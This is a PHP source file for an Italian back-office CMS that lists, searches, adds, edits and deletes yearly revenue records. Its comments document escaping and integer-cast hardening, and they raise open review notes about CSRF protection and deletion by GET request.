<?php
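/**
 * Build the HTML listing of every row in the `fatturato` table, ordered by year.
 *
 * Expects the LISTA and FATTU constants to be defined by the including script.
 * Every database value is HTML-escaped before it is concatenated into the page:
 * the rows are written by salvaf() from request data, so emitting them raw
 * would allow stored markup or script to run in the back-office page.
 *
 * @return string HTML fragment (headline, "Inserisci" button, table, pager).
 */
function listaf() {
    global $conn, $id;

    $output = '<div class="row">
<div class="col-md-6">
<div class="headline">
<h3>' . LISTA . ' ' . FATTU . '</h3>
</div>
</div>
<div class="col-md-6">
<a href="?azione=inseriscif" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
</div>
</div>';
    $output .= '<div class="row">
<div class="col-md-12">
<div class="table-wrapper">
<div class="wrapper-panel">
<table class="table table-striped" id="tab" >
<thead>
<tr>
<th>Anno</th>
<th>Importo</th>
<th width="5%"></th>
<th width="5%"></th>
</tr>
</thead>
<tbody>';

    $result = mysql_query('select * from fatturato order by ft_anno ASC');

    // mysql_query() returns false on failure; skip the loop instead of
    // handing a non-resource to mysql_fetch_assoc().
    if ($result !== false) {
        while ($row = mysql_fetch_assoc($result)) {
            // ENT_QUOTES keeps the value inert in element content and in quoted attributes.
            $anno = htmlspecialchars($row['ft_anno'], ENT_QUOTES);
            $importo = htmlspecialchars($row['ft_importo'], ENT_QUOTES);
            // The key is only ever used as a numeric id in the links below.
            $rowId = (int) $row['ft_id'];

            // The original cells carried a stray </a> with no opening tag; dropped here.
            $output .= '<tr>
<td>' . $anno . '</td>
<td>' . $importo . '</td>
<td><a title="Modifica" href="cms.php?azione=modificaf&id=' . $rowId . '"><i class="icon-edit"></i></a></td>
<td><a class="right cancel show-option" title="Elimina" href="cms.php?azione=eliminaf&id=' . $rowId . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>';
            $output .= '</tr>';
        }
    }

    $output .= '</tbody>
</table>
</div>
<div class="wrapper-paging pull-right">
<ul>
<li><a class="paging-back"><</a></li>
<li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li>
<li><a class="paging-next">></a></li>
</ul>
</div> <br /><br />
</div>
</div>
</div>';

    return ($output);
}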
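/**
 * Render the search form and the `fatturato` rows whose year matches the
 * submitted "ricerca" term.
 *
 * Expects the LISTA, FATTU, ADD, CERCA, MOD and DELETE constants to be defined
 * by the including script.
 *
 * Fixes relative to the previous version:
 *  - the result cells read an undefined $row instead of the fetched $array, so
 *    year and amount were always empty;
 *  - database values are HTML-escaped before being written into the page;
 *  - the column headers named "Username"/"Permission" although the cells hold
 *    year and amount; they now match the headers used by listaf();
 *  - an unused "Administrator/Member" label computation was removed.
 *
 * @return string HTML fragment with the search form and the result table.
 */
function resultf() {
    global $conn, $id;

    // A missing or non-string field is treated as an empty search term.
    $termine = (isset($_POST['ricerca']) && is_string($_POST['ricerca'])) ? $_POST['ricerca'] : '';

    // Escaped for use inside a quoted SQL string literal. NOTE(review): the
    // escaping depends on the connection character set being configured
    // correctly; confirm where the connection is opened.
    $result = mysql_real_escape_string($termine);

    $output = '<span class="left"><h1 class="left">' . LISTA . ' ' . FATTU . '</h1> <a class="right button" href="?azione=inseriscif">' . ADD . ' »</a></span><span class="right">';
    $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=resultf" method="post">';
    $output .= '<input type="text" style="padding:5px" id="ricerca" name="ricerca"/>';
    $output .= ' <input type="submit" value="' . CERCA . '" id="myButton"/>';
    $output .= '</form></span>';
    $output .= '<div id="show" class="clear">';
    $output .= '<table align="center" width="100%">';
    $output .= '<tr style="background-color:#555555">
<th>Anno</th>
<th>Importo</th>
<th></th>
<th></th> </tr>';

    $sql = 'select * from fatturato WHERE ft_anno like \'%' . $result . '%\' order by ft_id DESC';
    $dati = mysql_query($sql, $conn) or die(mysql_error());

    if (mysql_num_rows($dati) > 0) {
        while ($array = mysql_fetch_array($dati)) {
            // ENT_QUOTES keeps the value inert in element content and in quoted attributes.
            $anno = htmlspecialchars($array['ft_anno'], ENT_QUOTES);
            $importo = htmlspecialchars($array['ft_importo'], ENT_QUOTES);
            $rowId = (int) $array['ft_id'];

            $output .= '<tr bgcolor=#dddddd>
<td>' . $anno . '</td>
<td>' . $importo . '</td><td align="center"><a class="right modifica show-option" title="' . MOD . ' Password" href="index.php?azione=modificaf&id=' . $rowId . '"></a></td>';
            $output .= '<td align="center"><a class="right cancel show-option" title="' . DELETE . '" href="index.php?azione=eliminaf&id=' . $rowId . '" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"></a></td>';
            $output .= '</tr>';
        }
    } else {
        $output .= '<tr>';
        $output .= '<td colspan="4">Nessun risultato</td>';
        $output .= '</tr>';
    }

    // Both branches close the table and the wrapper the same way.
    $output .= '</table><br /><br />';
    $output .= '</div>';

    return ($output);
}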
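/**
 * Render the empty "add record" form for the `fatturato` table.
 *
 * Expects the ADD and FATTU constants to be defined by the including script.
 * The form posts "anno" and "importo" to ?azione=salvaf.
 *
 * @return string HTML fragment with the headline, back link and form.
 */
function inseriscif() {
    global $conn, $id;

    // $id is a global set outside this file (presumably from the request;
    // confirm against the dispatcher). Casting it to an integer keeps
    // anything other than a number out of the form's action attribute.
    $recordId = (int) $id;

    $output = '<div class="row">
<div class="col-md-10">
<div class="headline">
<h3>'.ADD.' ' . FATTU . '</h3>
</div>
</div>
<div class="col-md-2">
<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
</div>
</div>';
    $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaf&id=' . $recordId . '" method="post">
<div class="row">
<div class="col-md-4">
<label>ANNO</label>
<input class="form-control" type="text" placeholder="Type something…" name="anno">
</div>
</div>
<br />
<div class="row">
<div class="col-md-4">
<label>IMPORTO</label>
<input class="form-control" type="text" placeholder="Type something…" name="importo">
</div>
</div>
<br />
<button class="btn btn-default" type="submit">Salva</button>
<br /><br />
</form>';

    return ($output);
}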
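/**
 * Render the "edit record" form for one `fatturato` row, pre-filled with the
 * stored year and amount.
 *
 * Expects the MOD and FATTU constants to be defined by the including script.
 *
 * Fixes relative to the previous version:
 *  - $id was concatenated into the SQL text as-is; it is now cast to an
 *    integer, so only a number can reach the query;
 *  - the stored values are HTML-escaped before being placed in the value
 *    attributes (a stored double quote could otherwise close the attribute);
 *  - a duplicated closing quote after the "anno" value attribute was removed;
 *  - a missing row no longer leads to array access on a non-array.
 *
 * @return string HTML fragment with the headline, back link and form.
 */
function modificaf() {
    global $conn, $id;

    // $id is a global set outside this file (presumably from the request;
    // confirm against the dispatcher).
    $recordId = (int) $id;

    $sql = 'select * from fatturato where ft_id="' . $recordId . '" ';
    $dati_ute = mysql_query($sql) or die(mysql_error());
    $array_ute = mysql_fetch_array($dati_ute);

    // mysql_fetch_array() returns false when no row matches; fall back to an empty form.
    $anno = '';
    $importo = '';
    if (is_array($array_ute)) {
        // ENT_QUOTES so quotes in the stored value cannot end the attribute.
        $anno = htmlspecialchars($array_ute['ft_anno'], ENT_QUOTES);
        $importo = htmlspecialchars($array_ute['ft_importo'], ENT_QUOTES);
    }

    $output = '<div class="row">
<div class="col-md-10">
<div class="headline">
<h3>'.MOD.' ' . FATTU . '</h3>
</div>
</div>
<div class="col-md-2">
<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
</div>
</div>';
    $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaf&id=' . $recordId . '" method="post">
<div class="row">
<div class="col-md-4">
<label>Anno</label>
<input class="form-control" type="text" placeholder="Type something…" name="anno" value="' . $anno . '">
</div>
</div>
<br />
<div class="row">
<div class="col-md-4">
<label>Importo</label>
<input class="form-control" type="text" placeholder="Type something…" name="importo" value="' . $importo . '">
</div>
</div>
<br />
<button class="btn btn-default" type="submit">Salva</button>
<br /><br />
</form>';

    return ($output);
}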
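/**
 * Insert a new `fatturato` row (when $id is 0) or update the existing one,
 * using the posted "anno" and "importo" fields, then redirect to the list.
 *
 * Fixes relative to the previous version:
 *  - the posted values were concatenated into the SQL text unescaped; they are
 *    now passed through mysql_real_escape_string() on the same connection the
 *    query runs on, and $id is cast to an integer;
 *  - the form-error branch could never run because the error flag was never
 *    set; it is now used when a field is missing from the request;
 *  - an unreachable mysql_insert_id() call after the return was removed.
 *
 * NOTE(review): the escaping relies on the connection character set being
 * configured correctly, and this API is the legacy ext/mysql one; moving to
 * prepared statements needs changes where $conn is opened, outside this block.
 * NOTE(review): no anti-CSRF token is checked here; confirm whether the caller
 * verifies one before dispatching to this function.
 *
 * @return string Status message (the redirect header is sent before returning).
 */
function salvaf() {
    global $conn, $id;

    $campiPresenti = isset($_POST['anno'], $_POST['importo'])
        && is_string($_POST['anno'])
        && is_string($_POST['importo']);

    if (!$campiPresenti) {
        return 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
    }

    // Escaped for use inside the double-quoted SQL string literals below.
    $anno = mysql_real_escape_string($_POST['anno'], $conn);
    $importo = mysql_real_escape_string($_POST['importo'], $conn);

    // $id is a global set outside this file (presumably from the request;
    // confirm against the dispatcher). Only its integer value is used.
    $recordId = (int) $id;

    if ($recordId === 0) {
        $sql = 'insert into fatturato(ft_anno, ft_importo) values("' . $anno . '", "' . $importo . '")';
        $output = 'Record inserito.<br /><a href="index.php?azione=listan">Torna alla lista</a>';
        mysql_query($sql, $conn) or die(mysql_error());
        header('location: cms.php?ins&azione=listaf');
    } else {
        $sql = 'update fatturato set ft_anno="' . $anno . '",ft_importo="' . $importo . '" where ft_id="' . $recordId . '" ';
        $output = 'Record aggiornato.<br /><a href="index.php?azione=listan&page=1">Torna alla lista</a>';
        mysql_query($sql, $conn) or die(mysql_error());
        header('location: cms.php?agg&azione=listaf');
    }

    // Return the status message to the caller.
    return ($output);
}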
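/**
 * Delete one `fatturato` row by id and redirect back to the list.
 *
 * $id was previously concatenated into the DELETE statement as-is; it is now
 * cast to an integer so only a number can reach the query.
 *
 * NOTE(review): the list pages reach this action through a plain link
 * (?azione=eliminaf&id=N), so the delete is triggered by a GET request and no
 * anti-CSRF token is checked here; confirm whether the caller enforces a
 * session and token check, and consider requiring POST for this action.
 *
 * @return void
 */
function eliminaf() {
    global $conn, $id;

    // $id is a global set outside this file (presumably from the request;
    // confirm against the dispatcher).
    $recordId = (int) $id;

    $sql = 'delete from fatturato where ft_id="' . $recordId . '"';
    mysql_query($sql) or die(mysql_error());
    header('location: cms.php?del&azione=listaf');
}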
?>